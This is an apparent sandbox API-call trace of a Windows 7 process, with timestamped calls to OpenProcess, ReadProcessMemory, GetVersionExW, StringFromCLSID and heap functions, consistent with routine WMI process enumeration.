[0572.994] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x1f4
[0573.007] GetLastError () returned 0x0
[0573.007] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.007] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd7018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.007] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.007] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x352850, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.008] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x3526c8, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.008] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.009] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.009] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd7020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.009] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x351ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.009] malloc (_Size=0x80) returned 0x3f1710
[0573.009] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x35270a, lpBuffer=0x3f1710, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0573.010] free (_Block=0x3f1710)
[0573.010] CloseHandle (hObject=0x1f4) returned 1
[0573.011] _ui64tow (_Value=0x7e4, _Buffer="1432", _Radix=10) returned="2020"
[0573.013] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="2020") returned 4
[0573.014] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.014] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.026] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x0
[0573.026] CloseHandle (hObject=0x0) returned 0
[0573.027] _ui64tow (_Value=0x3f8, _Buffer="2020", _Radix=10) returned="1016"
[0573.029] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1016") returned 4
[0573.030] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.030] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.042] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x1f4
[0573.042] GetLastError () returned 0x0
[0573.042] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd4018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x528c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x526ca, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.044] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.044] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.044] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd4020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.044] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x51ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.045] malloc (_Size=0xc6) returned 0x3f1710
[0573.045] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x52702, lpBuffer=0x3f1710, nSize=0xc4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0573.045] free (_Block=0x3f1710)
[0573.046] CloseHandle (hObject=0x1f4) returned 1
[0573.046] _ui64tow (_Value=0x48c, _Buffer="1016", _Radix=10) returned="1164"
[0573.048] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1164") returned 4
[0573.049] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.049] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.067] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x1f4
[0573.067] GetLastError () returned 0x0
[0573.067] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.067] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd3018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.067] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.068] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x352350, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.068] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x35215a, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.068] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.069] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.069] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd3020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.069] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x351990, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.069] malloc (_Size=0xf4) returned 0x3f1710
[0573.069] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x35219a, lpBuffer=0x3f1710, nSize=0xf2, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0573.070] free (_Block=0x3f1710)
[0573.070] CloseHandle (hObject=0x1f4) returned 1
[0573.071] _ui64tow (_Value=0x9c, _Buffer="1164", _Radix=10) returned="156"
[0573.074] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="156") returned 3
[0573.074] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.075] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.088] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c) returned 0x1f4
[0573.088] GetLastError () returned 0x0
[0573.088] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x292820, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2926ca, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.089] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.089] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.089] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.090] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x291ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.090] malloc (_Size=0x28) returned 0x3efdb0
[0573.090] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x29270c, lpBuffer=0x3efdb0, nSize=0x26, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3efdb0*, lpNumberOfBytesRead=0x0) returned 1
[0573.091] free (_Block=0x3efdb0)
[0573.091] CloseHandle (hObject=0x1f4) returned 1
[0573.093] free (_Block=0x3f1c80)
[0573.093] malloc (_Size=0x48) returned 0x3ed130
[0573.093] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcedab8 | out: lpSystemTimeAsFileTime=0xcedab8*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.093] SetEvent (hEvent=0x1e8) returned 1
[0573.136] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9d0
[0573.136] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9d0, pulNumLanguages=0xcee620 | out: pulNumLanguages=0xcee620) returned 1
[0573.136] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9d0 | out: hHeap=0x1c0000) returned 1
Thread:
id = 254
os_tid = 0x1d8
Thread:
id = 255
os_tid = 0x11c
[0655.633] DllCanUnloadNow () returned 0x0
[0655.633] ResetEvent (hEvent=0x1cc) returned 1
[0655.633] GetExitCodeThread (in: hThread=0x1f0, lpExitCode=0x117f470 | out: lpExitCode=0x117f470) returned 1
[0655.633] SetEvent (hEvent=0x1e8) returned 1
[0655.633] WaitForSingleObjectEx (hHandle=0x1f0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0655.643] CloseHandle (hObject=0x1f0) returned 1
[0655.643] CloseHandle (hObject=0x1e8) returned 1
[0655.643] SetEvent (hEvent=0x1cc) returned 1
[0655.644] GetProcAddress (hModule=0x7feff780000, lpProcName="StringFromCLSID") returned 0x7feff789370
[0655.645] StringFromCLSID (in: rclsid=0x3bf2f0*(Data1=0x73e9a405, Data2=0xfa4, Data3=0x11d3, Data4=([0]=0x91, [1]=0xc, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0xa6, [6]=0x30, [7]=0xbe)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{73E9A405-0FA4-11D3-910C-00105AA630BE}") returned 0x0
[0655.645] GetProcAddress (hModule=0x7feff780000, lpProcName="CoTaskMemFree") returned 0x7feff7a8e20
[0655.645] CoTaskMemFree (pv=0x203580)
[0655.645] StringFromCLSID (in: rclsid=0x3de5b0*(Data1=0xe31a80d2, Data2=0xd12f, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{E31A80D2-D12F-11D2-911F-0060081A46FD}") returned 0x0
[0655.645] CoTaskMemFree (pv=0x203580)
[0655.646] StringFromCLSID (in: rclsid=0x3f00f0*(Data1=0x77609c22, Data2=0xcdaa, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1e, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{77609C22-CDAA-11D2-911E-0060081A46FD}") returned 0x0
[0655.646] CoTaskMemFree (pv=0x203580)
[0655.646] StringFromCLSID (in: rclsid=0x3f0160*(Data1=0x15e4c152, Data2=0xd051, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{15E4C152-D051-11D2-911F-0060081A46FD}") returned 0x0
[0655.646] CoTaskMemFree (pv=0x203580)
[0655.646] StringFromCLSID (in: rclsid=0x3f01d0*(Data1=0xc2bb0b38, Data2=0x8549, Data3=0x48a6, Data4=([0]=0xa5, [1]=0x8e, [2]=0xe7, [3]=0x4, [4]=0xdf, [5]=0xc1, [6]=0x9d, [7]=0x80)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{C2BB0B38-8549-48A6-A58E-E704DFC19D80}") returned 0x0
[0655.646] CoTaskMemFree (pv=0x203580)
[0655.647] StringFromCLSID (in: rclsid=0x3f0240*(Data1=0xea6034f1, Data2=0xfad, Data3=0x11d3, Data4=([0]=0x91, [1]=0xc, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0xa6, [6]=0x30, [7]=0xbe)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{EA6034F1-0FAD-11D3-910C-00105AA630BE}") returned 0x0
[0655.647] CoTaskMemFree (pv=0x203580)
[0655.647] StringFromCLSID (in: rclsid=0x3f02b0*(Data1=0xddea7e32, Data2=0xcce8, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1e, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{DDEA7E32-CCE8-11D2-911E-0060081A46FD}") returned 0x0
[0655.647] CoTaskMemFree (pv=0x203580)
[0655.647] StringFromCLSID (in: rclsid=0x3f0350*(Data1=0xc9369990, Data2=0xf3a8, Data3=0x4bac, Data4=([0]=0xa3, [1]=0x60, [2]=0x47, [3]=0xba, [4]=0xa0, [5]=0xec, [6]=0x47, [7]=0xa0)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{C9369990-F3A8-4BAC-A360-47BAA0EC47A0}") returned 0x0
[0655.647] CoTaskMemFree (pv=0x203580)
[0655.648] StringFromCLSID (in: rclsid=0x3f03c0*(Data1=0xd60e9c22, Data2=0xd127, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{D60E9C22-D127-11D2-911F-0060081A46FD}") returned 0x0
[0655.648] CoTaskMemFree (pv=0x203580)
[0655.648] StringFromCLSID (in: rclsid=0x3f0430*(Data1=0xdd3b4892, Data2=0xcd0f, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1e, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{DD3B4892-CD0F-11D2-911E-0060081A46FD}") returned 0x0
[0655.648] CoTaskMemFree (pv=0x203580)
[0655.648] StringFromCLSID (in: rclsid=0x3f04a0*(Data1=0xf54db7bf, Data2=0xfb4, Data3=0x11d3, Data4=([0]=0x91, [1]=0xc, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0xa6, [6]=0x30, [7]=0xbe)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{F54DB7BF-0FB4-11D3-910C-00105AA630BE}") returned 0x0
[0655.649] CoTaskMemFree (pv=0x203580)
[0655.649] StringFromCLSID (in: rclsid=0x3f0510*(Data1=0x643966a2, Data2=0xd19f, Data3=0x11d2, Data4=([0]=0x91, [1]=0x20, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{643966A2-D19F-11D2-9120-0060081A46FD}") returned 0x0
[0655.649] CoTaskMemFree (pv=0x203580)
[0655.649] StringFromCLSID (in: rclsid=0x3f0580*(Data1=0x4d060f17, Data2=0xc791, Data3=0x11d2, Data4=([0]=0xb3, [1]=0x53, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x85, [7]=0x69)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{4D060F17-C791-11D2-B353-00105A1F8569}") returned 0x0
[0655.649] CoTaskMemFree (pv=0x203580)
[0655.649] StringFromCLSID (in: rclsid=0x3f05f0*(Data1=0xedc5c632, Data2=0xd027, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{EDC5C632-D027-11D2-911F-0060081A46FD}") returned 0x0
[0655.650] CoTaskMemFree (pv=0x203580)
Thread:
id = 256
os_tid = 0x1ec
[0564.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0x493e0, bAlertable=0) returned 0x0
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0x2710, bAlertable=0) returned 0x0
[0572.524] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0573.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.094] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0x2710, bAlertable=0) returned 0x102
[0583.120] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x75c27950, dwHighDateTime=0x1dab599))
[0583.121] free (_Block=0x3eef20)
[0583.124] FreeLibrary (hLibModule=0x77c30000) returned 1
[0583.125] free (_Block=0x3f1bc0)
[0583.126] free (_Block=0x3ed130)
[0583.127] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
Thread:
id = 277
os_tid = 0x6cc
[0669.490] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.491] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0669.512] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0669.513] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd850
[0669.513] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0669.513] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x2c) returned 0x22ac10
[0669.513] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd850 | out: hHeap=0x1c0000) returned 1
[0669.514] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0xc8) returned 0x1f6760
[0669.515] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1f6760 | out: hHeap=0x1c0000) returned 1
[0669.515] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x34) returned 0x22ac50
[0669.515] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22ac50 | out: hHeap=0x1c0000) returned 1
[0669.516] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x80) returned 0x213a90
[0669.516] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x22ac10 | out: hHeap=0x1c0000) returned 1
[0669.521] memcpy (in: _Dst=0x134e698, _Src=0x22feac, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.522] memcpy (in: _Dst=0x134e698, _Src=0x22f7b9, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.523] memcpy (in: _Dst=0x134e698, _Src=0x22feb4, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.523] memcpy (in: _Dst=0x134e698, _Src=0x22f7bf, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.523] memcpy (in: _Dst=0x134e698, _Src=0x22f7c1, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.547] memcpy (in: _Dst=0x134e698, _Src=0x299009, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.547] memcpy (in: _Dst=0x134e698, _Src=0x29900b, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.548] memcpy (in: _Dst=0x134e698, _Src=0x29900d, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.548] memcpy (in: _Dst=0x134e698, _Src=0x29900f, _Size=0x2 | out: _Dst=0x134e698) returned 0x134e698
[0669.549] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x227420
[0669.549] SafeArrayGetElemsize (psa=0x22b0a0) returned 0x8
[0669.549] memcpy (in: _Dst=0x134e480, _Src=0x134e3a8, _Size=0x8 | out: _Dst=0x134e480) returned 0x134e480
[0669.550] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x227420 | out: hHeap=0x1c0000) returned 1
[0669.550] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa770 | out: hHeap=0x1c0000) returned 1
[0669.550] memcpy (in: _Dst=0x134e698, _Src=0x23b40e, _Size=0x4 | out: _Dst=0x134e698) returned 0x134e698
[0669.562] DllGetClassObject (in: rclsid=0x201550*(Data1=0xd63a5850, Data2=0x8f16, Data3=0x11cf, Data4=([0]=0x9f, [1]=0x47, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbf, [6]=0x34, [7]=0x5c)), riid=0x13fd45308*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x134e450 | out: ppv=0x134e450*=0x3eef20) returned 0x0
[0669.625] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fefa2a60b0, UserDataCount=0x5, UserData=0x134e610) returned 0x0
